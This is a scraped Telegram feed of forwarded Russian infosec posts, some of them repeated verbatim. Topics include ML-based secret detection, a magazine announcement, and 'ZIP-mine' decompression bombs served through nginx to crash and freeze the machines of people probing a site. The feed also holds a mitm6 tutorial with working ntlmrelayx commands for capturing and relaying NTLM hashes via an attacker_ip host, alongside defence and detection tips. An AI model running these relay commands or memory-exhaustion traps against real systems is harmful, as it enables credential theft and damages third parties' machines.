Forwarded from Blue (h/c)at Café
Всё чаще секреты утекают не из кода, а из внутренних систем типа Confluence, Jira, корпоративных вики и мессенджеров
1. Сканирование контента
2. Эвристика/шаблоны/LSP
3. Результат
Но с чем мы сталкиваемся, разбирая выхлоп?
- С проблемами😎
Да, вот и появляется куча FP и структуры, которые нам совершенно не подходят. Вот тут и появляется идея сделать фильтрацию через ИИ. Но упс, а что нам теперь, скармливать все наши данные в нейронку, даже если локальную, то представьте сколько это данных и контекста. Тут нам и приходят на помощь zero-shot модели.
🤗Ссылка - ТЫК
- Кандидат признаётся "секретом", если:
- сработало сильное правило или высокая уверенность эвристики, или/и
- zero-shot модель оценила вероятность ≥ порога.
Регулярки и энтропия дают точные, но ограниченные результаты, они видят только то, что явно похоже на известные токены (GitHub, Slack, AWS и т.п.).
Zero-shot модель добавляет гибкость и контекст. Она умеет распознавать скрытые или "словесно замаскированные" секреты, например, когда пароль указан в тексте без префиксов или когда он указан как тестовый (ага, те самые тестовые пароли, идущие в прод
В итоге, снижается число ложных срабатываний, не теряя полноты и без проблем с ложным информированием о тестовых данных.
Рекомендация простая - создать небольшой «золотой» набор размеченных страниц и посчитать precision / recall / F1 до и после включения пост-верификации.
На практике zero-shot модель даёт заметный прирост точности без серьёзной потери полноты при корректной настройке порога (на тестах мне удалось достичь точности определения валидного секрета, с отсеиванием тестовых и фп в 98.4%)
Zero-shot классификация не заменяет ручной контроль, но превращает поиск утечек в управляемый и воспроизводимый процесс, а не в хаотичный ручной grep по страницам. А как итог, отмечу, что Вы можете достаточно быстро привести ранее затруднительные задачи в ML-powered AppSec и без использования "нанытой видеокарты".
Спасибо за внимание и буду рад, если накидаете моделей на тесты
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Social Engineering
🗞 Paged Out #7.
• В свободном доступе есть один интересный журнал по информационной безопасности и этичному хакингу. Единственный минус - журнал публикуется на английском языке, но его формат (1 страница = 1 статья) является весьма интересным, а перевести информацию на нужный язык не составит особого труда (особенно c chatgpt и deepl).
• Так вот, на днях был опубликован 7-й выпуск. Журнал весьма ламповый и полностью бесплатный, а контент собирают авторы со всего света. К слову, вы можете направить свой материал для публикации, который пройдет модерацию и будет опубликован. Скачать все выпуски можно по ссылке: https://pagedout.institute. Приятного чтения =)
S.E. ▪️ infosec.work ▪️ VT
• В свободном доступе есть один интересный журнал по информационной безопасности и этичному хакингу. Единственный минус - журнал публикуется на английском языке, но его формат (1 страница = 1 статья) является весьма интересным, а перевести информацию на нужный язык не составит особого труда (особенно c chatgpt и deepl).
• Так вот, на днях был опубликован 7-й выпуск. Журнал весьма ламповый и полностью бесплатный, а контент собирают авторы со всего света. К слову, вы можете направить свой материал для публикации, который пройдет модерацию и будет опубликован. Скачать все выпуски можно по ссылке: https://pagedout.institute. Приятного чтения =)
S.E. ▪️ infosec.work ▪️ VT
❤2
Forwarded from s0i37_channel
Сегодня веб формирует большую часть поверхности атак современного периметра. И есть один весьма болезненный приём против хакеров, ковыряющих чужой веб...
Протокол HTTP для экономии трафика позволяет доставлять содержимое со сжатием. Но насколько сильного сжатия можно достичь, если использовать лишь одну единственную последовательность – например, всего один байт?
Традиционно ZIP-бомбы являлись оружием хакеров, но
Так всего один 1МБ данных, принятых по протоколу HTTP, может развернуться у хакера в 1ГБ в его оперативной памяти. 10МБ, соответственно, превратится уже в 10ГБ, что почти наверняка положит процесс на типовом арендованном сервере. Ну а 30МБ думаю хватит с головой и на средний десктоп.
Сегодня открытие обычного сайта в браузере – это скачивания порядка 10МБ данных, что с нынешними скоростями происходит за пару секунд. Значит 10ГБ оперативной памяти мы заберем у атакующего быстрее, чем он успеет подумать.
Такая встречная атака настолько проста в реализации, что провернуть её можно даже в терминале всего несколькими командами (скрин). Теперь открытие любой веб-страницы на таком листенере вызовет взрыв ZIP-бомбы в RAM, которая заберёт всю память в радиусе 10ГБ.
Протокол HTTP для экономии трафика позволяет доставлять содержимое со сжатием. Но насколько сильного сжатия можно достичь, если использовать лишь одну единственную последовательность – например, всего один байт?
Традиционно ZIP-бомбы являлись оружием хакеров, но
PatientZero предложил интересную идею их использования в агрессивно защитных целях - ZIP-мины.Так всего один 1МБ данных, принятых по протоколу HTTP, может развернуться у хакера в 1ГБ в его оперативной памяти. 10МБ, соответственно, превратится уже в 10ГБ, что почти наверняка положит процесс на типовом арендованном сервере. Ну а 30МБ думаю хватит с головой и на средний десктоп.
Сегодня открытие обычного сайта в браузере – это скачивания порядка 10МБ данных, что с нынешними скоростями происходит за пару секунд. Значит 10ГБ оперативной памяти мы заберем у атакующего быстрее, чем он успеет подумать.
Такая встречная атака настолько проста в реализации, что провернуть её можно даже в терминале всего несколькими командами (скрин). Теперь открытие любой веб-страницы на таком листенере вызовет взрыв ZIP-бомбы в RAM, которая заберёт всю память в радиусе 10ГБ.
Forwarded from s0i37_channel
Давайте теперь посмотрим, как справятся с нами разнообразные хакерские разведывательные сканеры, ведь именно они наша главная цель.
Как правило, обнаружив сайт, хакеры запускают инструменты, простукивающие его рабочий каталог на наличие потенциально интересных ресурсов. Например, хакер может сделать это популярным инструментом dirsearch.
Обычно такие инструменты закидывают сайт десятками тысяч запросов, но тут на первом же запросе ещё на этапе калибровки dirsearch исчерпал всю память и аварийно завершился. И произошло это через каких-то 3-4 секунды.
Другие аналоги: wfuzz, ffuf ведут себя аналогичным образом - падают наступив на ZIP-мину.
Падение даже одного хакерского процесса с полным исчерпанием ресурсов ОС негативно сказывается и на общей производительности системы - тк память всех соседних процессов вытесняется на диск (swap), а сам дисковый кэш, обеспечивающий быстрый ввод-вывод, будет сброшен.
Как правило, обнаружив сайт, хакеры запускают инструменты, простукивающие его рабочий каталог на наличие потенциально интересных ресурсов. Например, хакер может сделать это популярным инструментом dirsearch.
Обычно такие инструменты закидывают сайт десятками тысяч запросов, но тут на первом же запросе ещё на этапе калибровки dirsearch исчерпал всю память и аварийно завершился. И произошло это через каких-то 3-4 секунды.
Другие аналоги: wfuzz, ffuf ведут себя аналогичным образом - падают наступив на ZIP-мину.
Падение даже одного хакерского процесса с полным исчерпанием ресурсов ОС негативно сказывается и на общей производительности системы - тк память всех соседних процессов вытесняется на диск (swap), а сам дисковый кэш, обеспечивающий быстрый ввод-вывод, будет сброшен.
Forwarded from s0i37_channel
Не редки случаи, когда хакеры натравливают на свои цели тяжёлую артиллерию – коммерческие (обычно крякнутые) сканеры, такие как, например, Acunetix.
Всего через минуту, как хакер натравил на нас сканер уязвимостей, вся его оперативная память оказалась исчерпана, и вся ОС зависла на несколько минут. Разумеется, никаких результатов у такого сканирования не будет.
Велика вероятность, что если хакер попадёт в наш «ZIP-капкан», он ощутит и более негативные последствия…
В ОС Linux существует известная проблема механизма OOM Killer, при которой утечка памяти приводит к сильному замедлению системы вплоть до зависания ОС. И подвержены ей главным образом браузеры.
Так что, если хакер попробует открыть наш сайт в браузере, то его ОС после утечки всей памяти и вовсе намертво зависнет, до полной перезагрузки системы.
Повесив систему хакеру и, вероятно, вынудив его сделать жесткую перезагрузку, мы можем заставить его потерять какие-то несохранённые файлы.
Как же можно применить это для защиты функционирующего сайта? Одним из простых решений может быть проксирование на ZIP-бомбу через nginx какой-нибудь не используемый каталог сайта, но такой, который точно будут искать хакеры. Отличными выбором могут быть каталоги
Легитимные пользователи такие каталоги вряд ли станут искать, а тот, кто станет – будет проучен!
Всего через минуту, как хакер натравил на нас сканер уязвимостей, вся его оперативная память оказалась исчерпана, и вся ОС зависла на несколько минут. Разумеется, никаких результатов у такого сканирования не будет.
Велика вероятность, что если хакер попадёт в наш «ZIP-капкан», он ощутит и более негативные последствия…
В ОС Linux существует известная проблема механизма OOM Killer, при которой утечка памяти приводит к сильному замедлению системы вплоть до зависания ОС. И подвержены ей главным образом браузеры.
Так что, если хакер попробует открыть наш сайт в браузере, то его ОС после утечки всей памяти и вовсе намертво зависнет, до полной перезагрузки системы.
Повесив систему хакеру и, вероятно, вынудив его сделать жесткую перезагрузку, мы можем заставить его потерять какие-то несохранённые файлы.
Как же можно применить это для защиты функционирующего сайта? Одним из простых решений может быть проксирование на ZIP-бомбу через nginx какой-нибудь не используемый каталог сайта, но такой, который точно будут искать хакеры. Отличными выбором могут быть каталоги
.git или .svn. Они вряд ли нужны вашему веб-приложению, но для любого хакера must-have заглянуть туда.server {
...
location /.git {
proxy_pass http://localhost:8080;
}
}Легитимные пользователи такие каталоги вряд ли станут искать, а тот, кто станет – будет проучен!
Хабр
Пожар уничтожил облачное хранилище правительства Южной Кореи, резервных копий нет
Пожар в штаб-квартире Национальной службы информационных ресурсов (NIRS) в Тэджоне (Республика Корея) уничтожил государственную облачную систему G-Drive, стерев рабочие файлы, которые индивидуально...
🔗Ссылка:
https://habr.com/ru/news/953800/
https://habr.com/ru/news/953800/
Forwarded from RedBlue Notes
ОБЗОР УТИЛИТЫ MITM6: ФУНКЦИОНАЛ, АТАКИ И ЗАЩИТА
RedBlue Notes на связи! Сегодня расскажу о утилите, которую стоит запускать при пентесте любой инфраструктуры с Active Directory
ФУНКЦИОНАЛ MITM6
mitm6 - это инструмент для проведения MITM атак в сетях IPv6. Он позволяет эксплуатировать особенности работы протокола NDP (Neighbor Discovery Protocol) для перехвата трафика и потенциального получения учетных данных. mitm6 становится шлюзом по умолчанию для всех IPv6-клиентов в локальной сети. Это достигается путем прослушивания DHCPv6-запросов и отправки поддельных ответов, указывающих атакующего как DNS по умолчанию. После этого весь IPv6-трафик жертв начинает направляться к атакующему💻
АТАКИ С ИСПОЛЬЗОВАНИЕМ MITM6🔓
1. Захват NTLM-хэшей
После того как mitm6 стал DNS-сервером по умолчанию, он может отвечать на DNS-запросы поддельными записями, направляя трафик на контроллер атакующего. Если клиент попытается обратиться к несуществующему ресурсу (например, `wpad.domain.local`), mitm6 может предоставить адрес атакующего, который будет выдавать себя за WPAD-прокси. Это приведёт к автоматической отправке NTLM-аутентификации от клиента, которую можно перехватить
Запускаем mitm6:
Запускаем ntlmrelayx для захвата хэшей:
Ждём....
Теперь, когда клиенты начнут использовать атакующего как DNS-сервер, их попытки аутентификации будут перехватываться и ретранслироваться😼
2. Ретрансляция NTLM-хэшей
С помощью утилиты ntlmrelayx, которая часто используется совместно с mitm6, можно ретранслировать перехваченные NTLM-хэши на другие системы. Это позволяет выполнять атаки на повышение привилегий, например, создание новых пользователей или выполнение команд на удалённых системах🕺
3. Перехват LDAP-трафика
Если клиенты используют IPv6 для связи с контроллерами домена, mitm6 может перенаправить этот трафик через себя, что даёт возможность перехватить LDAP-запросы и потенциально получить доступ к конфиденциальной информации🤫
ЗАЩИТА ОТ MITM6🛡
1. Отключите IPv6 (если не используется)
2. Настройте защиту от поддельных DHCP-ответов и RA-сообщений от неавторизованных источников
3. Использование статических маршрутов и DNS. Это снизит вероятность того, что они примут поддельные настройки от mitm6
4. Мониторьте трафик. Регулярный анализ сетевого трафика на предмет аномалий, таких как неожиданные изменения маршрутов или DNS-запросы к подозрительным адресам, может помочь обнаружить использование mitm6
ДЕТЕКТ MITM6👀
1. Ищите аномальные DHCPv6-ответы в логах, это может указать на использование mitm6. Обратите внимание на новые IPv6-адреса, назначенные вручную и необычные DNS по умолчанию
2. Ищите подозрительные RA-сообщения, аномальные DNS-запросы и ответы
3. Используйте IDS/IPS для отслеживания подозрительных действий, связанных с IPv6 и NDP
Надеюсь, на этот канал подписаны Red и Blue тимеры из одной компании и они начнут играть в кошки-мышки с mitm6 после прочтения этого поста. Да начнутся Голодные игры, и пусть удача всегда будет с вами!🥰
Подписывайтесь на канал, дальше больше!
RedBlue Notes на связи! Сегодня расскажу о утилите, которую стоит запускать при пентесте любой инфраструктуры с Active Directory
Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.
ФУНКЦИОНАЛ MITM6
mitm6 - это инструмент для проведения MITM атак в сетях IPv6. Он позволяет эксплуатировать особенности работы протокола NDP (Neighbor Discovery Protocol) для перехвата трафика и потенциального получения учетных данных. mitm6 становится шлюзом по умолчанию для всех IPv6-клиентов в локальной сети. Это достигается путем прослушивания DHCPv6-запросов и отправки поддельных ответов, указывающих атакующего как DNS по умолчанию. После этого весь IPv6-трафик жертв начинает направляться к атакующему
АТАКИ С ИСПОЛЬЗОВАНИЕМ MITM6
1. Захват NTLM-хэшей
После того как mitm6 стал DNS-сервером по умолчанию, он может отвечать на DNS-запросы поддельными записями, направляя трафик на контроллер атакующего. Если клиент попытается обратиться к несуществующему ресурсу (например, `wpad.domain.local`), mitm6 может предоставить адрес атакующего, который будет выдавать себя за WPAD-прокси. Это приведёт к автоматической отправке NTLM-аутентификации от клиента, которую можно перехватить
Запускаем mitm6:
mitm6 -d domain.local
Запускаем ntlmrelayx для захвата хэшей:
ntlmrelayx.py -6 -wh attacker_ip -of hashes.txt
Ждём....
Теперь, когда клиенты начнут использовать атакующего как DNS-сервер, их попытки аутентификации будут перехватываться и ретранслироваться
2. Ретрансляция NTLM-хэшей
С помощью утилиты ntlmrelayx, которая часто используется совместно с mitm6, можно ретранслировать перехваченные NTLM-хэши на другие системы. Это позволяет выполнять атаки на повышение привилегий, например, создание новых пользователей или выполнение команд на удалённых системах
ntlmrelayx.py -6 -wh attacker_ip -t smb://target_ip -c "whoami"
3. Перехват LDAP-трафика
Если клиенты используют IPv6 для связи с контроллерами домена, mitm6 может перенаправить этот трафик через себя, что даёт возможность перехватить LDAP-запросы и потенциально получить доступ к конфиденциальной информации
ntlmrelayx.py -6 -wh attacker_ip -t ldaps://target_dc_ip
ЗАЩИТА ОТ MITM6
1. Отключите IPv6 (если не используется)
2. Настройте защиту от поддельных DHCP-ответов и RA-сообщений от неавторизованных источников
3. Использование статических маршрутов и DNS. Это снизит вероятность того, что они примут поддельные настройки от mitm6
4. Мониторьте трафик. Регулярный анализ сетевого трафика на предмет аномалий, таких как неожиданные изменения маршрутов или DNS-запросы к подозрительным адресам, может помочь обнаружить использование mitm6
ДЕТЕКТ MITM6
1. Ищите аномальные DHCPv6-ответы в логах, это может указать на использование mitm6. Обратите внимание на новые IPv6-адреса, назначенные вручную и необычные DNS по умолчанию
2. Ищите подозрительные RA-сообщения, аномальные DNS-запросы и ответы
3. Используйте IDS/IPS для отслеживания подозрительных действий, связанных с IPv6 и NDP
Надеюсь, на этот канал подписаны Red и Blue тимеры из одной компании и они начнут играть в кошки-мышки с mitm6 после прочтения этого поста. Да начнутся Голодные игры, и пусть удача всегда будет с вами!
Подписывайтесь на канал, дальше больше!
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2✍1